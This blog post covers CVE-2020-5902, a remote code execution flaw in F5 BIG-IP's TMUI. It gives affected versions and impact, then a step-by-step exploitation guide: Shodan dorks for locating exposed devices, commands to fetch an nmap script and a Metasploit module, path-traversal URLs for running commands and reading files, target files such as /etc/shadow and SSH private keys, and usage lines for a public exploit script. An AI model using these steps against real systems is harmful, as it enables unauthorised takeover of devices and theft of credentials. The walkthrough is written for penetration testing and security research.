Swafox Blog
Search
K

CVE-2020-5902

# Disclaimer
For educational purposes only. This article is directed towards penetration testing and security research. The author does not claim any responsibility for the illegal use of provided knowledge.
# Overview
The Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has a Remote Code Execution (RCE) vulnerability in undisclosed pages.
# Vulnerable versions:
15.0.0-15.1.0.3
14.1.0-14.1.2.5
13.1.0-13.1.3.3
12.1.0-12.1.5.1
11.6.1-11.6.5.1
# BIG IP - Definition
BIG-IP is a family of products covering software and hardware designed around application availability, access control, and security solutions.�
  • BIG-IP Local Traffic Manager (LTM) - provides the platform for creating virtual servers, performance, service, protocol, authentication, and security profiles to define and shape your application traffic.
  • BIG-IP DNS - Distributes and secures DNS traffic, advertising your application namespaces.
# Impact - 9.8 Critical
This vulnerability allows for unauthenticated attackers, with network access to the Configuration utility, through the BIG-IP management port and/or self IPs, to execute arbitrary system commands, create or delete files, disable services. This vulnerability may result in a complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected.
Additional commentary: NVD Info & F5
# Basic exploitation structure
A following tmui login link manipulation allows an attacker to interact with tmshCmd.jsp and fileRead.jsp, respectively opening RCE and LFI attack possibilities.
/tmui/login.jsp/..;/tmui/locallb/workspace/{file}.jsp?=
# Discovering vulnerable systems
Method 1:
title:"Big-IP®" org:"Organization Name"
Method 2:
http.title:"BIG-IP®- Redirect" org:"Organization Name"
Additional filters:
country:"" - search by country
city:"" - search by city
net:"" Search based on an IP/CIDR
hostname:"" Locate devices by hostname
Script installation:
cd /usr/share/nmap/scripts && wget https://raw.githubusercontent.com/RootUp/PersonalStuff/master/http-vuln-cve2020-5902.nse
Usage:
nmap --script=http-vuln-cve2020-5902.nse {IP}
# Add -p443 for faster output
# Metasploit module
Metasploit framework has published a public exploit for CVE-2020-5902 on July 5th. Note: Due to the novelty of the exploit, it is not recommended to use it. If you are willing to use it - do it responsibly, at your own risk.
Module installation:
cd /usr/share/metasploit-framework/modules/exploits/linux/http && wget https://raw.githubusercontent.com/rapid7/metasploit-framework/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
# Change f5_bigip_tmui_rce.rb permissions in case metasploit throws an error.
# Manual exploitation
{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command={command}
# Useful command examples: whoami, uname, pwd
File Read:
{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName={file_path}
# Files to look for: /etc/passwd, /etc/shadow, /home/$USER/.ssh/id_rsa, /config/bigip.conf
Directory listing:
{IP}/tmui/login.jsp/..;/tmui/locallb/workspace/directoryList.jsp?directoryPath={directory_path}
# Directories to look at: /tmp, /home, /root
# Automatic exploitation
CVE-2020-5902 has already got an automated python script, allowing attackers to significantly reduce exploitation time.
Python script installation:
git clone https://github.com/dunderhay/CVE-2020-5902.git
Usage:
LFI - python3 CVE-2020-5902.py -t example.com -x lfr -f /etc/passwd
RCE - python3 CVE-2020-5902.py -t example.com -x rce -a whoami
# Personal thoughts
BIGIP CVE-2020-5902�is a fresh new thing that suddenly hit cybersecurity. Some people talk about its great significance, some are just trying to get easy bug bounty. But, in my opinion, this CVE is a product of hard work, which should be treated with respect and appropriately mitigated by web developers. I would like to thank all the awesome people who immediately started publishing about the exploit and spread some great awareness. Here is a small list of useful resources to continue monitoring the issue:
  1. 2.
    NVD
  2. 3.
    Yaml